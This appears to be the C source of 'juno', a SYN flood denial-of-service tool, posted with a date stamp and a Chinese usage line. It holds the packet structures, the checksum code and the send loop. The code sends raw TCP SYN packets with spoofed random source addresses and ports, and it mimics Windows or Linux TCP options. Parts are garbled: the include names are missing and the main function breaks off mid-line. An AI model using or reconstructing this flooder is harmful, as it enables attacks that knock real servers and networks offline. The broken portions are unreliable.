2010-06-24 12:25:02
char about[] = "juno.c by Sorcerer of DALnet\n"; /* for best results, compile with: gcc -O2 juno.c -o juno thanks to bleach for releasing this for me, I'm too lazy to do it myself P.S I'd just like to send out a big "get out of the closet" to malkman, for making useless mods to this source that actually make it *less* effective. Get a life man. */ #include#include #include #include #include #include #include #include #define USELESS_INFO #define EMULATE_WINDOWS /* EMULATE_WINDOWS or EMULATE_LINUX */ #define RANDOMIZE_SOURCE_IP /* random source ips */ #define RANDOMIZE_SOURCE_PORT /* random source ports */ #undef DELAY 1000 /* microsecond delay, undef for none */ /* nothing beyond here is useful to people who can't program */ #ifndef EMULATE_WINDOWS # ifndef EMULATE_LINUX # define EMULATE_WINDOWS 1 # endif #endif struct syn { unsigned char verihl; unsigned char tos; unsigned short len; unsigned short id; unsigned short flg_ofs; unsigned char ttl; unsigned char proto; unsigned short ipsum; unsigned long src; unsigned long dst; unsigned short sport; unsigned short dport; unsigned long seq; unsigned long ack_seq; unsigned char offset; unsigned char flags; unsigned short win; unsigned short tcpsum; unsigned short urgptr; #ifdef EMULATE_WINDOWS char opt[8]; #else # ifdef EMULATE_LINUX char opt[20]; # endif #endif }; int resolve(char *name,unsigned long *ip) { struct hostent *host; if ((*ip=inet_addr(name)) == INADDR_NONE) { if (!(host=gethostbyname(name))) return(-1); *ip=((struct in_addr *)host->h_addr)->s_addr; } return(0); } int getsock(void) { int s = socket(PF_INET,SOCK_RAW,6),one=1; if(s<1) return(0); if(setsockopt(s,IPPROTO_IP,IP_HDRINCL,(char *)&one,sizeof(one))<0) return(0); return(s); } int getport(char *s, unsigned short *out) { char const *p; int n; if(!*s) return(-1); for (p=s;*p;p++) if(*p<'0'||*p>'9') return(-2); if(p-s>5) return(-3); if(((n=atoi(s))>65535) || (n<0)) return(4); *out=htons(n); return(0); } void prep_syn(struct syn *syn) { syn->verihl = 69; syn->len = htons(sizeof(struct syn)); syn->flg_ofs = 64; syn->proto = 6; syn->flags = 2; #ifdef EMULATE_WINDOWS syn->ttl = 128; syn->offset = 112; syn->win = htons(8192); syn->opt[0] = 2; syn->opt[1] = 4; syn->opt[2] = 5; syn->opt[3] = 0xB4; syn->opt[4] = 1; syn->opt[5] = 1; syn->opt[6] = 4; syn->opt[7] = 2; #else # ifdef EMULATE_LINUX syn->tos = 16; syn->ttl = 64; syn->offset = 160; syn->win = htons(15536); syn->opt[0] = 0x02; syn->opt[1] = 0x04; syn->opt[2] = 0x0F; syn->opt[3] = 0x2C; syn->opt[4] = 0x04; syn->opt[5] = 0x02; syn->opt[6] = 0x08; syn->opt[7] = 0x0A; syn->opt[9] = 0x05; syn->opt[10] = 0x27; syn->opt[11] = 0x2D; syn->opt[13] = 0x05; syn->opt[14] = 0x27; syn->opt[15] = 0x2D; syn->opt[16] = 0x01; syn->opt[17] = 0x03; syn->opt[18] = 0x03; # endif #endif } int starttime,outcount=0; int xmit_syn(struct syn *syn,int sock,struct sockaddr_in *targ) { register int count = (sizeof(struct syn)-20) >> 1,sum; register unsigned short *p = &syn->sport; #ifdef RANDOMIZE_SOURCE_IP syn->src = random(); #endif syn->id = 1+255*((random()%256)|0xFF); #ifdef RANDOMIZE_SOURCE_PORT syn->sport = htons(1024 + (random() & 2048)); #endif syn->seq = random(); syn->ack_seq = random(); syn->tcpsum = 0; sum = (syn->src >> 16) + (syn->src & 0xffff) + (syn->dst >> 16) + (syn->dst & 0xffff) + 1536 + htons(count << 1); while(count--) sum += *p++; sum = (sum >> 16) + (sum & 0xffff); syn->tcpsum = ~(sum += (sum >> 16)); outcount++; return(sendto(sock,syn,sizeof(struct syn),0,targ,sizeof(struct sockaddr_in))); } #ifdef RANDOMIZE_SOURCE_IP # ifdef RANDOMIZE_SOURCE_PORT # define TARGET_IP_INDEX 1 # else # define SOURCE_PORT_INDEX 1 # define TARGET_IP_INDEX 2 # endif #else # ifdef RANDOMIZE_SOURCE_PORT # define TARGET_IP_INDEX 2 # else # define SOURCE_PORT_INDEX 2 # define TARGET_IP_INDEX 3 # endif #endif void sig_proc(int signum) { int ctime=time(NULL); printf("\n -- statistics -----------------------\n"); printf(" packets sent: %d\n",outcount); printf(" bytes sent: %d\n",outcount * sizeof(struct syn)); printf(" seconds active: %d\n",ctime-starttime); printf(" average bytes/second: %d\n",(outcount * sizeof(struct syn))/(ctime-starttime)); printf(" -------------------------------------\n"); exit(1); } int main(int argc,char *argv[]) { struct syn syn; struct sockaddr_in targ; int sock; bzero(&syn,sizeof(struct syn)); if(argc "); #endif #ifndef RANDOMIZE_SOURCE_PORT fprintf(stderr,"
执行:./juno 80(port) 1000(connect number)